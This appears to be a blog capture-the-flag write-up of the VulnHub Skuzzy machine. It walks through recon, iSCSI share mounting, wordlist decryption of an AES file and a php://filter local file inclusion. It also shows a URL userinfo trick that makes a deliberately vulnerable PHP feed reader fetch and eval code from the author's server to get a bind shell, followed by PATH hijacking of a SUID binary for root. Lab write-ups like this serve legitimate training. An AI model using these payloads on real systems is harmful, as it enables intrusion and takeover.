Me and few of my friends were asked to test some vulnerable environment that will be used as a playground for students, it was a lot of fun and motivated me to do some vulnhub.com in free time.
That's my first write-up on the vulnhub machines, let me know if the description is good enough.
1. Reconnaissance
Running the machine gives us the IP of our target 192.168.1.111
Let's see what basic nmap scan can show us:
→ nmap -T4 -sV 192.168.1.111 Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-13 10:50 CEST Nmap scan report for skuzzy (192.168.1.111) Host is up (0.0011s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 3260/tcp open iscsi? Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 95.19 seconds
2. First flag
We can see 3 open ports, I've started from the last one. I have to admit that I've never used iscsi before, but after a bit of googling, I've successfully connected to and mounted the shares.→ sudo iscsiadm -m discovery -t st -p 192.168.1.111
192.168.1.111:3260,1 iqn.2017-02.local.skuzzy:storage.sys0
→ sudo iscsiadm -m node --login
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.1.111,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.1.111,3260] successful.
→ cd /media/e0ca44be-b1ed-403a-84bd-db5558d6bb7e
→ ls
bobsdisk.dsk flag1.txt lost+found
→ cat flag1.txt
Congratulations! You've discovered the first flag!
flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}
Let's see how you go with the next one...
3. Second flag
That was pretty straight forward, there was no vulnerability to exploit, as was the second flag, we can see that our mounted share contains bobdisk.dsk, we can mount that as well.→ sudo mount bobsdisk.dsk /media/bobsdisk → cd /media/bobsdisk → ls -la total 21 drwxr-xr-x 3 root root 1024 mar 14 10:56 . drwxr-x---+ 10 root root 4096 kwi 13 11:04 .. drwx------ 2 root root 12288 lut 28 09:56 lost+found -rw-r--r-- 1 root root 288 lut 28 10:25 ToAlice.csv.enc -rw-r--r-- 1 root root 2517 mar 14 10:56 ToAlice.eml
ToAlice.eml
G'day Alice,
You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs, and it's time we took a stand!
Starting now, today, immediately, I'm never using asymmetric key encryption again, and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at my local hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there is when it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right? Anyway, he said it won some big important competition among crypto geeks in October 2000? Lucky Y2K didn't happen then, I suppose or that would have been one boring party!
Anyway this algorithm sounded good to me. I used the updated version that won the competition.
You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly. My favourite new Spanish swear came in handy when this happened... supercalifragilisticoespialidoso !
Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. The key is, well, one awesome word I learnt in my recent Spanish classes!
Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot) :)
Cheers,
Bob.
PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...
PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}
4. Third flag
We got the second flag! And some tips how to decrypt the ToAlice.csv.enc, that can be found in the same directory. Keywords are:self explanatory
- symmetric keys from here on out
AES has two names, AES and Rijndael
- what the letters in its other name stand for
Rijndael did won a NIST comp in 2000
- it won some big important competition among crypto geeks in October 2000
AES has been updated in 2001
- updated version that won the competition.
AES-256
- 256 bit Lego kit
Maybe we should use /usr/share/wordlists/rockyou.txt from Kali Linux?
- ROCKYOU
AES-256-CBC
- those blocks chain togeather really does make them work
the password?
- supercalifragilisticoespialidoso
Used digest (-md is the openssl flag)
- -md sha256
So we should try AES-256-CBC with SHA256 digest and password supercalifragilisticoespialidoso or rockyou.txt wordlist. I've put supercalifragilisticoespialidoso at the begginning of the rockyou.txt and run the command:
→ /tmp/bruteforce-salted-openssl/bruteforce-salted-openssl -t 4 -f ~/wordlist/rockyou.txt -c aes-256-cbc -d sha256 ToAlice.csv.enc Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s. Tried passwords: 1 Tried passwords per second: inf Last tried password: iloveyou Password candidate: supercalifragilisticoespialidoso Tried passwords: 3475548 Tried passwords per second: 1737774,000000 Last tried password: supercalidosa Password candidate: supercalifragilisticoespialidosoLet's try that password:
→ openssl aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ~/vulnhub/ew_skuzzy/ToAlice.csv
enter aes-256-cbc decryption password:
→ cd ~/vulnhub/ew_skuzzy
→ cat ToAlice.csv
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
4. Fourth flag
It worked! We got 3 flags so far, and even more hints for the next steps. |
| http://192.168.1.111/5560a1468022758dba5e92ac8f2353c0/ |
 |
| http://192.168.1.111/c2444910794e037ebd8aaf257178c90b/?p=welcome |
 |
| http://192.168.1.111/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php |
<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Flag</h1>
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
<?php
// Ok, ok. Here's your flag!
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
//
// Well done, you're doing great so far!
// Next step. SHELL!
//
//
// Oh. That flag above? You're gonna need it...
?>
Which gives us the 4th flag.
5. Fifth flag
Next step seems to be Feed Reader tab, it allows to read and execute any php from remote host. |
| http://192.168.1.111/c2444910794e037ebd8aaf257178c90b/?p=reader |
We extract the code with LFI once again:
<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Feed Reader</h1>
<?php
if(isset($_GET['url'])) {
$url = $_GET['url'];
} else {
print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>");
}
if(isset($url) && strlen($url) != '') {
// Setup some variables.
$secretok = false;
$keyneeded = true;
// Localhost as a source doesn't need to use the key.
if(preg_match("#^http://127.0.0.1#", $url)) {
$keyneeded = false;
$secretok = true;
}
// Handle the key validation when it's needed.
if($keyneeded) {
$key = $_GET['key'];
if(is_array($key)) {
die("Array trick is mitigated ;)");
}
if(isset($key) && strlen($key) == '47') {
$hashedkey = hash('sha256', $key);
$secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";
// If you can use the following code for a timing attack
// then good luck :) But.. You have the source anyway, right? :)
if(strcmp($hashedkey, $secret) == 0) {
$secretok = true;
} else {
die("Sorry... Authentication failed. Key was invalid.");
}
} else {
die("Authentication invalid. You might need a key.");
}
}
// Just to make sure the above key check was passed.
if(!$secretok) {
die("Something went wrong with the authentication process");
}
// Now load the contents of the file we are reading, and parse
// the super awesomeness of its contents!
$f = file_get_contents($url);
$text = preg_split("/##text##/s", $f);
if(isset($text['1']) && strlen($text['1']) > 0) {
print($text['1']);
}
print "<br /><br />";
$php = preg_split("/##php##/s", $f);
if(isset($php['1']) && strlen($php['1']) > 0) {
eval($php['1']);
// "If Eval is the answer, you're asking the wrong question!" - SG
// It hurts me to write insecure code like this, but it is in the
// name of education, and FUN, so I'll let it slide this time.
}
}
?>
We can see from the code that we need some sort of a key of length 47, which is not bruteforcable. I felt a bit stuck over here. I found another way in. My thought process was, how do you trick the regex that the host is http://127.0.0.1, but the real host is different, I tried:
http://192.168.1.111/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1:asd@192.168.1.115:8000/costam.txt
Where 192.168.1.115:8000 was my server which serves costam.txt, we use 127.0.0.1 as username and asd as password, but because the server does not require you to login, it's ignored. That allows us to bypass the key check and load any file from our site we want(later on it turned out that previous flag was the key, which makes me think that this bug was ?not intended?).
 |
| costam.txt - bind shell |
After looking around, we can find not standard SUID binary at /opt/alicebackup
As we can see from strings, somewhere inside scp /tmp/special bob@alice.home:~ is used, scp does not have specified full path which means that linux will search for the scp in the PATH variable. We can make our own scp, that will be executed instead of the standard one, directory with our binary must be before the directory with real scp.
After doing so, we are root. We can find the flag inside the /root/flag.txt
It was a lot of fun and I look forward to doing next parts.
Great write up, been looking through the walkthrough's to find a better tool to decrypt the AES file (even though the password is in the text) bruteforce-salted-openssl is the best by FAR! thank you
ReplyDelete